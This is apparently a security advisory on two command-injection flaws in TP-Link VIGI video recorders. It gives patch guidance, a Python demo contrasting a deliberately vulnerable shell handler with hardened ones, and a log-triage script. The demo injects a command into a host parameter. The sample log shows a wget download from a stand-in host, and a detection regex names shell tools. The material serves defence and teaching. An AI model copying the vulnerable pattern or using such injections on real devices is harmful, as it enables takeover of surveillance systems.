Severity
High
Analysis Summary
Two high-severity vulnerabilities have been disclosed in TP-Link’s VIGI network video recorder (NVR) line, exposing surveillance infrastructure to remote command execution. The flaws, tracked as CVE-2025-7723 and CVE-2025-7724, affect the VIGI NVR1104H-4P V1 and VIGI NVR2016H-16MP V2 models. Both allow an attacker to inject and execute arbitrary operating-system commands on the recorder, which amounts to full device compromise. NVRs are a valuable target: a compromised recorder gives the attacker the stored footage, the ability to disrupt or blind recording, and a foothold on the internal network from which to pivot.
CVE-2025-7723 is an authenticated command injection vulnerability, rated High on the CVSS v4.0 scale, which requires the attacker to log in to the NVR before exploiting it. Once authenticated, the attacker can run arbitrary OS commands and so take full control of the device: manipulating or deleting surveillance data, altering its configuration, or using it as a launching point for further attacks on the network. The authentication requirement is a weaker barrier than it sounds when recorder credentials are default, shared or reused, and the access gained afterwards is the same as for the unauthenticated flaw.
In contrast, CVE-2025-7724 is an unauthenticated command injection vulnerability, scored 8.7 on CVSS v4.0 and therefore slightly higher, because it needs no credentials at all. Its attack vector is adjacent, meaning the attacker must be able to reach the NVR from the same network segment (directly, from an already compromised host on that segment, or through remote access that lands on it); beyond that, no privileges and no user interaction are required. Successful exploitation compromises the device’s confidentiality, integrity and availability completely, and in flat or poorly segmented networks it lets a single attacker sweep every reachable recorder with minimal effort.
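The class of flaw behind both CVEs is OS command injection: a web handler splices an untrusted request parameter into a shell command line. The block below is an added illustration of that pattern next to its hardened form. It is not TP-Link code and does not reproduce the actual VIGI injection point, which the advisory does not describe; the diagnostic endpoint, the `echo` stand-in for the real tool, the allowlist regex and the payload are all assumptions made for the demo.

```python
"""OS command injection, the class of flaw behind CVE-2025-7723/7724, shown on
a hypothetical firmware-style handler.  Added example: not TP-Link code and not
the real VIGI injection point, which is not described in the advisory."""
import re
import subprocess

# Hypothetical diagnostic endpoint: the web UI lets the user "ping" a host.
# 'echo' stands in for the real tool so the demo runs anywhere with /bin/sh.
TOOL = "echo"

# Allowlist for a hostname/IP parameter (assumed; tighten for the real field).
HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def vulnerable_run(host: str) -> str:
    """Vulnerable pattern: the parameter is spliced into a shell string.
    Anything sh treats specially (; | && $() backticks) becomes a second command."""
    cmdline = f"{TOOL} probing {host}"
    out = subprocess.run(cmdline, shell=True, capture_output=True, text=True)
    return out.stdout


def argv_only_run(host: str) -> str:
    """Half-hardened: argv execution with no shell keeps the whole value as
    one literal argument, so metacharacters are never interpreted.  Shown on
    its own to isolate this defence from input validation."""
    out = subprocess.run([TOOL, "probing", host], capture_output=True, text=True)
    return out.stdout


def hardened_run(host: str) -> str:
    """Hardened pattern: allowlist-validate the value, then execute via argv."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host parameter: {host!r}")
    out = subprocess.run([TOOL, "probing", host], capture_output=True, text=True)
    return out.stdout


# Constructed payload: a valid-looking address followed by an injected command.
PAYLOAD = "192.0.2.1; echo INJECTED"

if __name__ == "__main__":
    print("vulnerable:", repr(vulnerable_run(PAYLOAD)))   # two commands ran
    print("argv only :", repr(argv_only_run(PAYLOAD)))    # payload stayed literal
    try:
        hardened_run(PAYLOAD)
    except ValueError as exc:
        print("hardened  :", exc)                          # rejected up front
```

The two defences are independent: argv execution removes the shell parser from the path, and the allowlist stops hostile values before they reach any tool (some tools interpret their own arguments, so argv alone is not always enough). Firmware handlers written in C follow the same split, `system()` with a formatted buffer on the vulnerable side and `execve()` with a validated argument vector on the hardened side.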
TP-Link has released patched firmware, version 1.1.5 Build 250518 for the VIGI NVR1104H-4P V1 and version 1.3.1 Build 250407 for the VIGI NVR2016H-16MP V2, and urges all users to update immediately. After updating, administrators should confirm that security settings survived the upgrade and segment the recorders away from the rest of the network. Firmware should be obtained only from TP-Link’s official support portal so that its integrity can be trusted and the risk of installing a tampered image is avoided. Unpatched devices remain exposed to remote exploitation and to compromise of the footage they hold.
Impact
- Remote Command Execution
- Gain Access
- Data Manipulation
Indicators of Compromise
CVE
CVE-2025-7723
CVE-2025-7724
Affected Vendors
- TP-Link
Affected Products
- TP-Link VIGI NVR1104H-4P V1 - firmware prior to 1.1.5 Build 250518 (fixed in that build)
- TP-Link VIGI NVR2016H-16MP V2 - firmware prior to 1.3.1 Build 250407 (fixed in that build)
Remediation
- Refer to the TP-Link Security Advisory for patch, upgrade, or suggested workaround information.
- Download firmware updates only from TP-Link’s official support website to ensure authenticity and integrity.
- After updating, verify and reconfigure security settings to ensure no configurations were reset or disabled during the upgrade.
- Segment NVR devices on the network to isolate them from broader infrastructure and reduce the potential impact of compromise.
- Limit access to the management interface using firewall rules or VLANs, restrict it to trusted IP ranges only, and never expose it directly to the internet.
- Regularly review device logs and behaviour for suspicious activity, such as requests whose parameters carry shell metacharacters or download commands, and for management access from outside the trusted range.
- Disable unused services and ports on the NVRs to minimize the attack surface.
- Ensure strong, unique administrator credentials are used and implement two-factor authentication if supported.
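The two monitoring points above, injection attempts in request parameters and management access from outside the trusted range, can be checked with a small triage script over the recorder's web-access log. The block below is an added example, not TP-Link tooling: the log line format, the `/cgi-bin/...` endpoint names, the trusted subnet and the sample lines are all constructed assumptions, so adapt the regexes to whatever your device actually emits.

```python
"""Triage an NVR web-access log for command-injection attempts and for
management access from outside the trusted range.  Added example, not TP-Link
code; the log format, endpoints, subnet and sample lines are constructed."""
import ipaddress
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed combined-style format: client ip, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Shell metacharacters and common injection primitives, matched after decoding.
# Tune for your environment; short words like 'nc' can false-positive.
INJECT_RE = re.compile(
    r'[;&|`]|\$\(|\$\{|\n|>\s*/|/bin/(?:sh|bash)|\b(?:wget|curl|nc|telnetd)\b'
)

# Constructed management subnet; only these sources may reach the NVR UI.
TRUSTED = [ipaddress.ip_network("10.20.0.0/24")]

# Constructed sample log: one benign session, one injection attempt against a
# hypothetical diagnostic endpoint, one login from outside the trusted range.
SAMPLE_LOG = """\
10.20.0.15 - - [25/Jul/2025:09:12:01 +0000] "GET /cgi-bin/config?page=network HTTP/1.1" 200 1432
10.20.0.15 - - [25/Jul/2025:09:12:40 +0000] "GET /cgi-bin/diag?host=192.0.2.1 HTTP/1.1" 200 88
10.20.0.77 - - [25/Jul/2025:09:13:05 +0000] "GET /cgi-bin/diag?host=192.0.2.1%3Bwget%20http%3A%2F%2F198.51.100.9%2Fx%20-O%20%2Ftmp%2Fx HTTP/1.1" 200 88
192.168.50.3 - - [25/Jul/2025:09:14:10 +0000] "GET /cgi-bin/login HTTP/1.1" 401 0
""".splitlines()


def parse(line: str):
    """Split one access-log line into fields; return None for unparseable input."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qsl decodes once; unquote again so double-encoded payloads are seen.
    rec["params"] = [(k, unquote(v))
                     for k, v in parse_qsl(url.query, keep_blank_values=True)]
    return rec


def triage(lines):
    """Return (kind, source_ip, detail) findings for every suspicious line.
    Only query-string parameters are visible here; POST bodies are normally
    not logged, so this is a floor on what happened, not a full record."""
    findings = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        try:
            src = ipaddress.ip_address(rec["ip"])
        except ValueError:
            src = None  # hostname or garbage in the client field
        if src is not None and not any(src in net for net in TRUSTED):
            findings.append(("untrusted_source", rec["ip"], rec["path"]))
        for key, value in rec["params"]:
            if INJECT_RE.search(value):
                findings.append(("injection_attempt", rec["ip"],
                                 f"{rec['path']}?{key}={value}"))
    return findings


if __name__ == "__main__":
    for kind, ip, detail in triage(SAMPLE_LOG):
        print(f"{kind:18} {ip:15} {detail}")
```

Run it against the device's exported access log instead of `SAMPLE_LOG`; a hit on `injection_attempt` from a trusted address is the more alarming case, since it implies an authenticated session or a compromised host already inside the management segment.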